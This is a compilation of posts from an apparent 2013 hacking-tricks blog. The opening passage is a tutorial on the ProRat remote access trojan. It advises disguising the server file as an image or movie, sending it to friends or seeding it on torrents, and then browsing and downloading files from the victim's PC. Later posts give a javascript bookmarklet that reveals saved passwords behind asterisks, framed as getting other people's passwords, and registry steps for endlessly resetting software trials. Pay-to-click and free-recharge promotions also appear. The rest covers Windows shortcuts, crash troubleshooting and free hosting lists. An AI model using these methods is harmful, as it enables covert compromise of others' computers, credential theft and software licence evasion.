Step 5: Click on Create Server. Now you need to send server file to the target pc. There are many ways how you can do it. You can create server file that looks as image and email it to your friends . The most effective way by my opinion is to bind server file to the movie file and upload it to the torrent or rapidshare.


Step 6: After the target clicks on your server file, you'll be able to connect to the target PC. In main window of pro rat you'll see IP field. Type target PC IP Address. In the port field type 5110 and click Connect.

You’ll see the File Manager of hacked pc. You can download any file from the hacked PC

Sunday 4 August 2013

HOW TO EARN FREE MOBILE RECHARGE BY SENDING SMS FROM THESE TWO SITES


In my recent post i share you those websites who allowed you to how to send free sms worldwide without showing mobile number and registration and you all give me very impressive response for that post Thanks To All and so now i am deciding to share these two websites who recharge your mobile free . I have also you use these sites from last three to four months and i have recharge my mobile so many times from these sites . These  sites are real and so many people use them . It is an easy way to recharge your mobile by these sites . 
Now I am going to tell you more about these two following websites :


Delete An "undeletable" File



Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
At the command prompt type DEL <filename> where <filename> is the file you wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Close Task Manager.


Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal


Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to typ

Shortcut keys of windows


Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:

Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.


Keyboard Shortcuts

[Alt] and [Esc] Switch between running applications

[Alt] and letter Select menu item by underlined letter

[Ctrl] and [Esc] Open Program Menu

[Ctrl] and [F4] Close active document or group windows (does not work with some applications)

[Alt] and [F4] Quit active application or close current window

[Alt] and [-] Open Control menu for active document

Ctrl] Lft., Rt. arrow Move cursor forward or back one word

Ctrl] Up, Down arrow Move cursor forward or back one paragraph

[F1] Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box



acessability shortcuts

Right SHIFT for eight seconds........ Switch FilterKeys on and off.

Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.

Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.

SHIFT....... five times Switch StickyKeys on and off.

NUM LOCK...... for five seconds Switch ToggleKeys on and off.

explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.

NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.

NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.

LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.




Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog


internetbrowser

type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it


For Windows XP:

Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

Use these keyboard shortcuts for dialog boxes:

To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:


Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U

shortcuts you can use with Windows Explorer:


Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW

10 reasons why PCs crash U must Know





                                              



Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

1 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3 BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

4 Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5 Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

6 Viruses                            

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.

An excellent antivirus programme is McAfee VirusScan by Network Associates ( www.nai.com). Another is Norton AntiVirus 2000, made by Symantec ( www.symantec.com).

7 Printers

The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.

If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

8 Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.

Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from www.jv16.org

Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.

Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.

Remember to restore all the BIOS settings back to their former settings following installation.

9 Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10 Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.

It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

Friday 2 August 2013

How To Make Money Online


How does it work?

Traffic Pods and CoinUrl is a free service which accepts members from any country. Advertisers pay to have their websites / products exposed and you earn money from neobux while viewing these sites. Paid-To-Click, or simply PTC websites, act as middlemen between advertisers and consumers.



Why Traffic Pods is not a scam?
Traffic pod has been online and paying since 2001 while most PTCs close within a few months. It is what every other ptc site tries to be. A lot of people from around the world (including India) are earning money through this site. You can see their success stories and payment proofs in the forum. Also if you do a google search for "traffic pod review" you come back with plenty of pages of people telling how they have made money and been paid from this company.



How to Use God Mode in Windows 7



Windows 7 is now becoming popular among windows operating system  users.Windows 7 has cool hidden feature ,people calls it godmode in windows 7.GodMode is a folder that brings together a long list of customization settings allowing you to change all your settings from one place.This is very good as you can now change all your windows settings from one single place.

God Mode in Windows 7
Foll the following steps to create god mode folder:
1. Create a new folder
2. Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
You can change word GodMode to any other word you like your name or your friends name

3.The folder icon will change ,then  double click it to show the GodMode windows options.

How To Use Trial Software Full Time By Editing


How To Use Trial Software Full Time By Editing
Registry No need of any software for crack or for increase
time period, just edit registry. This works upon 3rd
party software, just applying simple steps you can
easy crack any software. What we going to do,
we will remove the trace that the software was
previously installed in your computer and the next time again when you install the software it will not
find the trace back that this software had been
previously installed in this computer. Steps are here: 1. First uninstall the software. 2. Go to Start and just type “Regedit”. 3. Now in 3rd step go to HK Local Machine ->
Software -> Your Software name. Delete the Key.
Do this for HK Current user if there exists a key of
that software. 4. Go to run type “%temp%. Delete all files. (it is for
delete temporary files) 5. Go to Users -> Username -> Appdata Check all 3
directories that is “Local”, “LocalLow”, “Roaming”
for your software entry. Delete that.
6. Now just reinstall application and enjoy the next
trial .
You can use this every time....

Password Protect Any Folder Without Any Software



In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.
How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
To change the password replace coolhacks with  new password in the above code


How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Get Password Behind Asterisks



This is trick will let you see password behind asterisks. You might be thinking what is asterisks. It is dots or stars you see when you type password. This trick will let you see password behind asterisks. often people save their password on browser so this trick will let you get their password easily.

Go to the page that contain password in asterisks.
Now copy the following code.

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

Paste the code into address bar of the page.
Now you will get the password on that page.
    

NOTE: This trick works on internet explorer and might works on old version of other
                    web browser.

How to Download Youtube Videos Without any Software


This is simple youtube trick which will allow you to download any youtube videos without any software or programme and in many different video formats such as mpeg4, 3gp, hd and many more from within the youtube site.

How To Download Youtube Videos ?

1. First Go to Youtube Homepage.
2. Then select the video you want to download. I will demonstrate with video url given below.

http://www.youtube.com/watch?v=_JAa3NvP6f4

Now add save or ss or kick before youtube and press enter.
3. After adding any of the above  keyword the above link will become.

http://www.saveyoutube.com/watch?v=_JAa3NvP6f4

Or

http://www.ssyoutube.com/watch?v=_JAa3NvP6f4

Or

http://www.kickyoutube.com/watch?v=_JAa3NvP6f4

 4. Now you will be redirected to a new page from where you can download youtube videos in any format of your choice. You may also download only the soundtrack of the video in mp3 format.

Free Hosting


Unlimited Bandwidth
Unlimited Webspace
Domain Hosting
PHP, FTP
Price: FREE!

there Free Web Hosting Package contains the following features:
Unlimited Data Transfer
Unlimited Disk Space
100mbps Network Connection
99.9% Uptime
Free Sub Directory ( hostultra.com/~you )
Cool yourname.vzz.net URL!
Free Subdomains ( Many domains to choose from! )
Free Domain Hosting ( yourdomain.com )
Custom Domain DNS Control ( A/CNAME/MX Records )
Browser and FTP Uploading
PHP / MySQL*
Unlimited Domains / Unlimited Subdomains
Free Search Engine Submission

http://www.hostultra.com/signup.html

Mail, FTP, CGI, Perl, SSI, PHP, ASP (FrontPage), MySQL, CPanel, and many, many more. You really will be your own webmaster. Our thoughtful and patient staff will guide you. Forums for when you seek the help of your peers. Emergency contacts for when you need concentrated one-on-one help.

What's the catch? There isn't one. PortalWorlds.NET is advertising and sponsor supported. Your site will show ads (your choice as to placement, side towers, top banners, popups, and similar) and earn money to cover PortalWorlds.NET's server and administrative costs. You do agree to do nothing offensive nor illegal.

In addition to the many things mentioned, you will also receive a Script Center (crammed with ready to use Perl), 100M diskspace, 250M bandwidth, 1 MySQL database, unlimited POP3 mailboxes (including autoresponders and forwarders), 1 mail list, Oscommerce package, PHP-Nuke, Invision Board, full CPanel.

.www.portalworlds.net thank "agresssor" for this one

GreatNow
USA, English
Hosting category: REG,BUSINESS,GAME,OTHER
http://www.greatnow.com/

Space 100 MB
Upload FTP Browser
Editor Advanced Basic
Ads Banner/Popup
Webaddress Subdomain
Features Domainhosting Subdomain Counter Form Guestbook

Beige Tower
USA, English
Hosting category: REG,BUSINESS,GAME,OTHER
http://beigetower.org

Space 100 MB
Upload FTP
Editor Advanced Basic
Ads No ads
Webaddress domain
Features PHP POP Email Domainhosting Telnet mySQL SSI CGI-BIN Guestbook

Comet Stream
Canada, English
Hosting category: REG,BUSINESS,GAME,OTHER
http://www.cometstream.net

Space 50 MB
Upload FTP Browser FrontPage
Editor Advanced Basic
Ads No ads
Webaddress Subdomain, Domain
Features PHP POP Email Domainhosting Subdomain mySQL SSI CGI-BIN Shopping Cart Counter Form Guestbook

1ASPHost
USA, English
Hosting category: REG,BUSINESS,GAME
http://www.1asphost.com

Space 100 MB
Upload Browser
Editor Advanced
Ads Popup
Webaddress /you
Features ASP SSI

Alexus Media
USA, English
Hosting category: REG,BUSINESS,GAME,OTHER
http://www.alexusmedia.com

Space 999 MB
Upload Browser
Editor Advanced Basic
Ads Popup
Webaddress directory
Features RealVideo RealAudio ASP SSI Guestbook

Angel Towns
USA, English
Hosting category: REG,BUSINESS
http://www.angeltowns.com

Space 50 MB
Upload Browser
Editor Advanced Basic
Ads No ads
Webaddress /members/you
Features Guestbook

Brinkster
USA, English
Hosting category: REG,BUSINESS,GAME
http://www.brinkster.com

Space 30 MB
Upload Browser
Editor Advanced
Ads Bannerad
Webaddress /you
Features mySQL ASP

FreeWebz.com
USA, English
Hosting category: REG,BUSINESS
http://members.freewebz.com

Space 100 MB
Upload Browser
Editor Advanced Basic
Ads No ads
Webaddress /you
Features POP Email Domainhosting SSI Shopping Cart Counter Form Guestbook

Illusionfxnet
USA, English
Hosting category: REG,OTHER
http://www.illusionfxnet.com

Space 250 MB
Upload Browser Email
Editor Advanced Basic
Ads No ads
Webaddress Subdomain and Domain
Features PHP POP Email Domainhosting Subdomain Telnet mySQL SSI CGI-BIN Shopping Cart Counter Form Guestbook

Internations
USA, English
Hosting category: REG
http://www.internations.net

Space 100 MB
Upload Browser
Editor Advanced Basic
Ads Topbanner
Webaddress /area/you
Features Form Guestbook

Snake INC
USA, English
Hosting category: REG
http://snake-inc.com

Space 100 MB
Upload FTP Browser
Editor Advanced Basic
Ads Banner + text
Webaddress Subdomain
Features PHP POP Email Domainhosting Subdomain mySQL SSI Counter Form Guestbook

Sphosting.com
USA, English
Hosting category: REG
http://www.sphosting.com/

Space 35 MB
Upload Browser
Editor Advanced Basic
Ads Pop-under
Webaddress Subdomain
Features Subdomain SSI Form Guestbook

Totalfreehost
USA, English
Hosting category: REG
http://www.totalfreehost.com

Space 50 MB
Upload FTP Email
Editor
Ads No ads
Webaddress Domain
Features PHP Domainhosting mySQL CGI-BIN

USALL
USA, English
Hosting category: REG,BUSINESS,GAME
http://www.webhosting.usallportal.com/free_webhosting.htm

Space 3000 MB
Upload Browser
Editor Basic
Ads Banner
Webaddress /members/you
Features Form

Web1000
USA, English
Hosting category: REG
http://www.web1000.com

Space 50 MB
Upload FTP
Editor Advanced
Ads No ads
Webaddress Subdomain
Features PHP POP Email Domainhosting Subdomain SSI Counter Guestbook

webspace4free.biz
USA, English
Hosting category: REG,BUSINESS,GAME
http://www.webspace4free.biz/?lang=english

http://nexuswebs.net
*new website just launched seems quite successful*
Space 200 MB
Upload Browser
Editor
Ads No ads
Webaddress Subdomain
Features PHP Domainhosting Subdomain mySQL CGI-BIN
NO Banner Advertisements
35mb Disk Space
Free Webmail Account
Free Subdomain - (yourname.nexuswebs.net)
Online Website Builder
Multi-Platform Template Editor
Website Template Library
24/7 FTP Access
Online File Manager
Email Virus Protection
Spam Filters
Message Board
Guest Book
Site Counter

http://www.tripod.lycos.nl/myaccount/freehosting/
50 MB webspace
NO Filesize limit
NO monthly transfer limit
PHP4.1 / MySQL (phpmyadmin) / counter / guesbook / personalised cgi feedback froms / customisable 404 error pages / FTP access

http://www.freeweb-hosting.com/
Q.Which files are accepted?
A.Currently we support standard html and images files, which means .htm, .html, .pdf, .gif, .jpg ,.png , .js, .css, .swf, .mid, .jar and .class. The size of your individual files should be < 85kb. Files exceeding this size will get automatically deleted. Besides that, there's no limit on the number of files you can host in your account.

Provider: DK3
Service: 50 MB Webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.dk3.com</font></b></font>
Max file size: 400KB (I agree this sucks)
Comments: The following things are supported, FTP, MySQL, PHP, Perl, SSI, WAP. Plus pre-made portal and forum are available free.
*Update*

Provider:Free Web Hosting
Service: 100 Megs of webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.freewebsitehosting.com/</font></b></font>
Summary:100 Megs Of Webspace, Free Site Promotion,FTP Support,Free Stats and Site Tools,
Unlimited Bandwidth,Free Guestbook, Fast and Reliable Servers,and Front Page Extensions.

Provider: Free Webs
Service: 100 Megs of space
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://members.freewebz.com/</font></b></font>
Summary: 100 megs of space, No banners of popups,Web Page Editing and HTML editing,FreeWebs Builder,
Site stats, Chatrooms,Guestbook, Counters, Site promotion, Form builder/Mailer, Photoalbums and more.

Provider: USALLportal
Service: 3 gigs of space
URL:http://www.webhosting.usallportal.com/free_webhosting.htm
Summary: 3 gigs of space! What else is there to know.

Provider:3hosting
Service: Unlimited Space
URL:http://www.3hosting.info/
Summary: Free hosting for adult sites, FTP access, Unlimited size of sites, Unlimited traffic, Quick Internet connection, TGP compatibility,
Free hosting of your domain.

Provider: HostUltra
Service: Unlimited space
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.hostultra.com/</font></b></font>
Summary: Unlimited Data Transfer
Unlimited Disk Space, 100mbps Network Connection, 99.9% Uptime, Free Sub Directory,
Free Domain Hosting, Custom Domain DNS Control, Browser and FTP Uploading,PHP,
Hosting for Unlimited Domains w/ Unlimited Subdomains, Free Search Engine Submission,
and NO ADS ON PAGES!

Provider:Crosswinds
Service: Unlimited webspace
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.crosswinds.net/</font></b></font>
Summary: Unlimited WebSpace, Web Based Email, Popups, $1 Premium Referral Reward, and more.

Provider:1AspHost
Service:100 Mb space
URL:<font color=#3A4F6C><font color=#3A4F6C><b> http://www.1asphost.com/</font></b></font>
Summary:100 MB of Web Space, Unlimited Bandwidth, Instant Account Activation,
Online Control Panel, Online Zip/Unzip Capability, Active Server Pages Version 3.0,
MS Access Database Connectivity.

Provider:Eccentrix
Service: 50 Mb space
URL:http://eccentrix.com/
